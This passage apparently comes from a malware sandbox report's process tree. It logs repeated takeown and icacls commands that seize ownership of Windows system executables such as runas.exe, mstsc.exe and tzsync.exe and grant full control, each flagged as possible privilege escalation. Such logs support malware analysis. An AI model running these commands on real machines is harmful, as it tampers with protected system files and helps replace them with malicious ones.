PID:2868
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2820
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2092
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1496
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1640
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:300
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1096
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:900
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1536
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1740
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1232
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1220
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1636
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1668
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1168
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1424
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2720
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1684
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2252
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2892
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1216
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2184
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2520
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2804
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1940
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2208
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2516
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1644
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2728
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2936
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2204
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:2580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:264
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2156
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2344
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3136
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3168
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3184
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3192
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3220
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3244
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3272
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:3296
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3332
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3356
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3372
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3404
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3436
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3456
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3500
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3528
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3552
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3616
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3680
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3700
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3716
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3736
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3756
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3776
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3852
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3872
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3896
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3960
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3980
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3996
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4028
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4048
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:4072
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:1296
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3096
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3216
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2356
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
PID:1260
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1524
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:532
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3564
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:1716
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:1800
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3712
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:3652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3728
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3772
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1292
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3976
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2848
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2504
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3596
-
-
